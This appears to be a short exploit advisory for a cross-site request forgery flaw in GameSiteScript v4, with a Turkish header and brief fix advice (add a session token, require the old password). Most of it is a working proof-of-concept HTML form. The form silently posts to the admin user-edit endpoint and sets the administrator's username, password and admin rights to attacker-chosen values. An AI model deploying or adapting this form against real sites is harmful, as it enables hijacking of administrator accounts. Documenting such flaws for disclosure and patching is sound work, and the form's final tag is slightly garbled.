< ------------------- header data start ------------------- >

#############################################################

# Application Name : GameSiteScript v4

# Vulnerable Type : Xsrf

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<form action=’http://www.gamesitescript.com/40demo/admin/index.php?act=users&mthd=edituser-form&id=1’ method=’POST’ enctype=’multipart/form-data’>
<input type=’hidden’ name=’username’ maxlength=’255’ value=’system’ /><br />
<input type=’hidden’ name=’email’ maxlength=’255’ value=’[email protected]’ /><br />
<input type=’hidden’ name=’password’ maxlength=’255’ value=’hacker’ /><br />
<select name=’isadmin’>
<option value=’Yes’>Yes - No Change</option>
<option value=’Yes’>Yes</option></select>
<input type=’hidden’ name=’id’ value=’1’ />
<input type=’hidden’ name=’act’ value=’users’ />
<input type=’hidden’ name=’mthd’ value=’edituser-do’ />
<input type=’image’ class=submit value=’Submit’ src= a target=_blank href=http://www.gamesitescript.com/40demo/plugins/site/themes/admin/submit.gif>http://www.gamesitescript.com/40demo/plugins/site/themes/admin/submit.gif />
</form>

< -- bug code end of -- >